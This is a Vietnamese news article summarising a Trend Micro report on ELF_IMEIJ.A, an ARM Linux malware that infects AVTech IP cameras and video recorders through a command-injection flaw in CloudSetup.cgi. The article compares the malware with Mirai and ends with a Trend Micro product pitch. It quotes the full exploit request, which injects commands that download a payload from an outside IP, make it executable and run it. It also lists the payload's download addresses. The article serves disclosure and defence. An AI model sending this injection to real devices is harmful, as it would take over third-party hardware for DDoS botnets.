Sau báo cáo loạt các mối đe dọa về Linux năm 2016, gần đây Trend Micro đã phát hiện thêm phần mềm độc hại ARM ELF_IMEIJ.A khai thác một lỗ hổng trong các thiết bị từ AVTech, một công ty giám sát công nghệ.
Linux từ lâu đã là hệ điều hành ưa thích dành cho các nền tảng doanh nghiệp và Internet of Things (IoT). Các thiết bị dựa trên Linux đang liên tục được triển khai trong các hệ thống thông minh trên nhiều ngành khác nhau với cổng IoT tạo điều kiện cho các giải pháp kết nối. Liên quan đến việc sử dụng rộng rãi này, số lượng các mối đe dọa bảo mật tập trung vào Linux đang gia tăng. Trước đây, Trend Micro đã báo cáo về một loạt các mối đe dọa Linux vào năm 2016, phần lớn là phần mềm độc hại Mirai (được phát hiện dưới dạng ELF_MIRAI).
Một bổ sung mới vào danh sách các mối đe dọa Linux là gần đây Trend Micro đã phát hiện phần mềm độc hại ARM ELF_IMEIJ.A. Mối đe doạ này khai thác một lỗ hổng trong các thiết bị từ AVTech, một công ty giám sát công nghệ. Lỗ hổng đã được phát hiện và báo cáo bởi Search-Lab, và đã được tiết lộ cho AVTech vào tháng 10 năm 2016. Tuy nhiên, ngay cả sau nhiều lần nỗ lực của Search-Lab để liên lạc với nhà cung cấp thì vẫn không có phản hồi.
Dòng lây nhiễm và so sánh với phần mềm độc hại tương tự
Các phần mềm độc hại đến thông qua RFIs. Một kẻ tấn công từ xa gửi yêu cầu này tới các địa chỉ IP ngẫu nhiên và cố gắng lợi dụng lỗ hổng này:
POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1
http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1
Cụ thể, nó khai thác CloudSetup.cgi, lỗ hổng của AVTech CGI Directory đã báo cáo, để thực hiện tiêm lệnh kích hoạt tải về phần mềm độc hại. Kẻ tấn công lừa thiết bị tải về tệp độc hại và thay đổi quyền của tệp để thực hiện.
Hình 1. Dòng lây nhiễm của ELF_IMEIJ.A.
Các điểm nhập cảnh cho phần mềm độc hại Linux mới này được kết nối với các thiết bị AVTech như máy ảnh IP, thiết bị CCTV và máy ghi hình mạng hỗ trợ đám mây AVTech. Khi phần mềm độc hại được cài đặt vào thiết bị, nó sẽ thu thập thông tin hệ thống và dữ liệu hoạt động mạng. Nó cũng có thể thực hiện các lệnh trình bao từ các phần mềm độc hại, bắt đầu các cuộc tấn công từ chối dịch vụ phân tán. Các thiết bị bị nhiễm cũng đặt các thiết bị khác kết nối với cùng một mạng có nguy cơ.
Có 3 địa chỉ IP nơi ELF_IMEIJ.A có thể được tải xuống và được lưu trữ trên 2 ISP riêng biệt.
- hxxp://172.247.116.3:8080/Arm1
- hxxp://172.247.116.21:85/Arm1
- hxxp://192.154.108.2:8080/Arm1
Các địa chỉ IP mà Trend Micro quan sát thấy kết nối với các liên kết tải xuống được đăng ký với một ISP có trụ sở tại Hàn Quốc.
Theo báo cáo, AVTech có trên 130.000 thiết bị khác nhau kết nối Internet, vì vậy cuộc tấn công có thể được sử dụng để đạt được và duy trì liên tục truy cập vào các thiết bị này. Các thiết bị cũng có thể được chuyển thành chương trình và được sử dụng để chuyển hướng thành các cuộc tấn công DDoS quy mô lớn. Giống như hầu hết các thiết bị kết nối, các mục tiêu không được đảm bảo mặc định và không thể giám sát trực tiếp.
Khả năng DDoS của ELF_IMEIJ.A có thể mang lại so sánh với Mirai, nhưng chúng cũng có sự khác biệt:
| MIRAI | IMEIJ | |
| Thiết bị ảnh hưởng | Nhiều loại | AVTech |
| Cổng sử dụng | 7547 5555 48101 |
39999 |
| Lỗ hổng | Thiết bị có phần mềm BusyBox | Các thiết bị không mã hóa để cài đặt phần mềm độc hại ELF_IMEIJ.A |
ELF_IMEIJ.A tham gia một nhóm các phần mềm độc hại được phát hiện gần đây khai thác nền tảng ARM trên các thiết bị Linux. ARM được sử dụng rộng rãi cho IoT và các thiết bị di động, gây trở ngại cần thiết cho kẻ tấn công nhắm mục tiêu vào các thiết bị này. Bên cạnh IMEIJ, còn có nhóm phần mềm độc hại bao gồm Umbreon (được phát hiện bởi Trend Micro dưới dạng ELF_UMBREON) và LuaBot (được phát hiện bởi Trend Micro dưới dạng ELF_LUABOT).
Để bảo vệ hiệu quả khỏi các mối đe dọa này, Trend Micro ™ Security và Trend Micro Internet Security, với các tính năng bảo mật có thể phát hiện phần mềm độc hại ở mức điểm cuối. Để bảo vệ các thiết bị được kết nối, Trend Micro Home Network Security có thể kiểm tra lưu lượng Internet giữa bộ định tuyến và các thiết bị kết nối với nó. Các doanh nghiệp cũng có thể sử dụng Trend Micro™ Deep Discovery™ Inspector là một thiết bị mạng giám sát tất cả các cổng và hơn 105 giao thức mạng khác nhau để phát hiện các mối đe dọa tiên tiến và các cuộc tấn công được nhắm mục tiêu.
NHƯ QUỲNH (Theo Trend Micro)